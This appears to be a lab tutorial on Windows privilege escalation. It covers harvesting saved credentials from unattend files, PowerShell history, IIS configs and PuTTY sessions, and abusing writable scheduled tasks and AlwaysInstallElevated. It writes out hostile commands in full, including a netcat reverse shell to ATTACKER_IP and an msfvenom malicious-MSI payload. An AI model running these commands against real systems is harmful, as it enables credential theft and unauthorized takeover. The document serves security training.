The easiest way to gain access to another user is to gather credentials from a compromised machine. Such credentials could exist for many reasons, including a careless user leaving them around in plaintext files; or even stored by some software like browsers or email clients.


## Unattended Windows Installations

When installing Windows on a large number of hosts, administrators may use Windows Deployment Services, which allows for a single operating system image to be deployed to several hosts through the network. These kinds of installations are referred to as unattended installations as they don't require user interaction. Such installations require the use of an administrator account to perform the initial setup, which might end up being stored in the machine in the following locations:

-   C:\Unattend.xml
-   C:\Windows\Panther\Unattend.xml
-   C:\Windows\Panther\Unattend\Unattend.xml
-   C:\Windows\system32\sysprep.inf
-   C:\Windows\system32\sysprep\sysprep.xml

As part of these files, you might encounter credentials:

```shell-session
<Credentials>
    <Username>Administrator</Username>
    <Domain>thm.local</Domain>
    <Password>MyPassword123</Password>
</Credentials>
```

  

## Powershell History

Whenever a user runs a command using Powershell, it gets stored into a file that keeps a memory of past commands. This is useful for repeating commands you have used before quickly. If a user runs a command that includes a password directly as part of the Powershell command line, it can later be retrieved by using the following command from a `cmd.exe` prompt:

```shell-session
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
```

**Note:** The command above will only work from cmd.exe, as Powershell won't recognize `%userprofile%` as an environment variable. To read the file from Powershell, you'd have to replace `%userprofile%` with `$Env:userprofile`. 

  

## Saved Windows Credentials

Windows allows us to use other users' credentials. This function also gives the option to save these credentials on the system. The command below will list saved credentials:

```shell-session
cmdkey /list
```

While you can't see the actual passwords, if you notice any credentials worth trying, you can use them with the `runas` command and the `/savecred` option, as seen below.

```shell-session
runas /savecred /user:admin cmd.exe
```

  

## IIS Configuration

Internet Information Services (IIS) is the default web server on Windows installations. The configuration of websites on IIS is stored in a file called `web.config` and can store passwords for databases or configured authentication mechanisms. Depending on the installed version of IIS, we can find web.config in one of the following locations:

-   C:\inetpub\wwwroot\web.config
-   C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config

Here is a quick way to find database connection strings on the file:

```shell-session
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
```

  

## Retrieve Credentials from Software: PuTTY

PuTTY is an SSH client commonly found on Windows systems. Instead of having to specify a connection's parameters every single time, users can store sessions where the IP, user and other configurations can be stored for later use. While PuTTY won't allow users to store their SSH password, it will store proxy configurations that include cleartext authentication credentials.

To retrieve the stored proxy credentials, you can search under the following registry key for ProxyPassword with the following command:

```shell-session
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
```

**Note:** Simon Tatham is the creator of PuTTY (and his name is part of the path), not the username for which we are retrieving the password. The stored proxy username should also be visible after running the command above.

Just as putty stores credentials, any software that stores passwords, including browsers, email clients, FTP clients, SSH clients, VNC software and others, will have methods to recover any passwords the user has saved.

Privilege escalation is not always a challenge. Some misconfigurations can allow you to obtain higher privileged user access and, in some cases, even administrator access. It would help if you considered these to belong more to the realm of CTF events rather than scenarios you will encounter during real penetration testing engagements. However, if none of the previously mentioned methods works, you can always go back to these.

  

## Scheduled Tasks

Looking into scheduled tasks on the target system, you may see a scheduled task that either lost its binary or it's using a binary you can modify.

Scheduled tasks can be listed from the command line using the `schtasks` command without any options. To retrieve detailed information about any of the services, you can use a command like the following one:

Command Prompt

```shell-session
C:\> schtasks /query /tn vulntask /fo list /v
Folder: \
HostName:                             THM-PC1
TaskName:                             \vulntask
Task To Run:                          C:\tasks\schtask.bat
Run As User:                          taskusr1
```

You will get lots of information about the task, but what matters for us is the "Task to Run" parameter which indicates what gets executed by the scheduled task, and the "Run As User" parameter, which shows the user that will be used to execute the task.

If our current user can modify or overwrite the "Task to Run" executable, we can control what gets executed by the taskusr1 user, resulting in a simple privilege escalation. To check the file permissions on the executable, we use `icacls`:

Command Prompt

```shell-session
C:\> icacls c:\tasks\schtask.bat
c:\tasks\schtask.bat NT AUTHORITY\SYSTEM:(I)(F)
                    BUILTIN\Administrators:(I)(F)
                    BUILTIN\Users:(I)(F)
```

As can be seen in the result, the **BUILTIN\Users** group has full access (F) over the task's binary. This means we can modify the .bat file and insert any payload we like. For your convenience, `nc64.exe` can be found on `C:\tools`. Let's change the bat file to spawn a reverse shell:

Command Prompt

```shell-session
C:\> echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat
```

We then start a listener on the attacker machine on the same port we indicated on our reverse shell:

```shell-session
nc -lvp 4444
```

The next time the scheduled task runs, you should receive the reverse shell with taskusr1 privileges. While you probably wouldn't be able to start the task in a real scenario and would have to wait for the scheduled task to trigger, we have provided your user with permissions to start the task manually to save you some time. We can run the task with the following command:

Command Prompt

```shell-session
C:\> schtasks /run /tn vulntask
```

And you will receive the reverse shell with taskusr1 privileges as expected:

Kali Linux

```shell-session
user@attackerpc$ nc -lvp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.175.90 50649
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
wprivesc1\taskusr1
```

Go to taskusr1 desktop to retrieve a flag. Don't forget to input the flag at the end of this task.

  

## AlwaysInstallElevated

Windows installer files (also known as .msi files) are used to install applications on the system. They usually run with the privilege level of the user that starts it. However, these can be configured to run with higher privileges from any user account (even unprivileged ones). This could potentially allow us to generate a malicious MSI file that would run with admin privileges.

**Note:** The AlwaysInstallElevated method won't work on this room's machine and it's included as information only.

This method requires two registry values to be set. You can query these from the command line using the commands below.

Command Prompt

```shell-session
C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
```

To be able to exploit this vulnerability, both should be set. Otherwise, exploitation will not be possible. If these are set, you can generate a malicious .msi file using `msfvenom`, as seen below:

```shell-session
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_MACHINE_IP LPORT=LOCAL_PORT -f msi -o malicious.msi
```

As this is a reverse shell, you should also run the Metasploit Handler module configured accordingly. Once you have transferred the file you have created, you can run the installer with the command below and receive the reverse shell:

Command Prompt

```shell-session
C:\> msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi
```